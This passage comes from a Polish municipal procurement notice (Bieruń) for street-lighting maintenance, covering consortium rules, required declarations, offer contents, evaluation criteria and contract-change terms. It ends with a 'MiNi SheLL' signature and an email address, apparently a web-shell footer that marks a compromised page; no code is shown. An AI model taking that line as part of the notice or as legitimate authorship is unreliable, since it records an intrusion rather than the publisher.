            Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
   5) Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego warunku.
    6)  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia 
         (np. konsorcjum/spółki cywilnej) do oferty należy dołączyć: 
a)	Pełnomocnictwo określające zasady reprezentacji ze wskazaniem pełnomocnika (lidera),  jego zakresu działania i uprawnień do reprezentowania wykonawców 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu 
i zawarcia umowy. 
Pełnomocnictwo  winno zawierać, w szczególności:
- nazwy wszystkich wykonawców wspólnie ubiegających się o realizację zamówienia  i   udzielających pełnomocnictwa;
- 	nazwę firmy Pełnomocnika/Lidera;
- zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania 
w postępowaniu i zawarcia umowy; 
- 	czas trwania (zawiązania umowy wykonawców wspólnie ubiegających się 
o udzielenie zamówienia tzn. co najmniej okres obejmujący realizację zamówienia);
- 	cel zawarcia (wspólną realizację zamówienia publicznego);
-	datę udzielenia pełnomocnictwa;
- podpisy wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia,  zgodne z zasadą ich reprezentacji.
Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
b) Oświadczenia wymienione w pkt. V.A SIWZ powinny być złożone w taki sposób, aby 
warunki, o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili  łącznie.   
c) Dokumenty wymienione w SIWZ w pkt. V. B ppkt. 1,2,3 Listy wymaganych dokumentów składa każdy z wykonawców wchodzących w skład podmiotu występującego wspólnie. 
d)Zgodnie z art. 141 ustawy pzp, wykonawcy wspólnie ubiegający się o udzielenie 
    zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.
B).
	Lista oświadczeń.
Wykonawca przystępujący do postępowania złoży oświadczenie z art. 22 ust. 1 ustawy pzp, że spełnia warunki dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień;
2)	posiadania wiedzy i doświadczenia; 
3)	dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4)	sytuacji ekonomicznej i finansowej.
 Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy. Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć pełnomocnictwo (ciąg pełnomocnictw), w formie oryginału lub notarialnie poświadczonej kopii. 
C). Oferta musi zawierać:                                                                                                                                
1)   wypełniony formularz ofertowy;
2)   wypełniony formularz kalkulacyjny;
3)  dokumenty i oświadczenia dla potwierdzenia spełnienia wymaganych warunków oraz wykazania o niepodleganiu wykluczeniu na podstawie art. 24 ust.1 ustawy pzp.;
       4) pełnomocnictwo w formie oryginału lub notarialnie poświadczonej kopii, jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika oraz 
w przypadku udziału  w postępowaniu podmiotów występujących wspólnie.

Do oferty należy załączyć informacje w zakresie części zamówienia, które zostaną powierzone podwykonawcom lub podania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy pzp, w celu wykazania spełnienia warunków udziału 
w postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Termin wykonania naprawy awaryjnej oświetlenia - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zmiana  postanowień  zawartej  umowy  może nastąpić za zgodą obu stron wyrażoną  na  piśmie  pod 
     rygorem   nieważności   tej  zmiany   w   granicach   określonych   Prawem   zamówień   publicznych.
2.  Zamawiający   przewiduje   możliwość   dokonania   zmiany   postanowień   umowy    w   przypadku:
     a) zmiany    ilości   i  lokalizacji  opraw  i  słupów  oświetleniowych,  w  tym wynikłych z oddania do 
         eksploatacji  nowych  instalacji oświetleniowych lub rezygnacji z prowadzenia napraw awaryjnych
         i usługi konserwacyjnej;
     b) zmiany wartości umowy w przypadku zmiany ilości opraw oświetleniowych;
     c) zmiany podwykonawcy lub powierzenia  podwykonawcy części zakresu zamówienia w przypadku
         wystąpienia  okoliczności, których  nie  można  było  przewidzieć  na  etapie  sporządzenia  oferty.
         Jeżeli  zmiana  lub  rezygnacja  podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca 
         powoływał  się, na  zasadach  określonych  w art. 26 ust. 2b ustawy Prawo zamówień publicznych, 
         w celu  wykazania  spełnienia  warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 
         ustawy,   Wykonawca    jest   obowiązany   wykazać   Zamawiającemu,    iż    proponowany    inny 
         podwykonawca  lub  wykonawca  samodzielnie  spełnia je w stopniu nie mniejszym niż wymagany
        w trakcie postępowania o udzielenie zamówienia.  
d) mającym   wpływ   na     realizację   przedmiotu   umowy,   w   przypadku   gdy   nastąpi   zmiana  
    powszechnie obowiązujących przepisów prawa;
e) zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie           wykraczają   poza  zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych, ul.Rynek 14, 43-150 Bieruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2014 godzina 11:00, miejsce: Urząd Miejski w Bieruniu - Sekretariat, pokój nr 9, I piętro, Segment A, 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com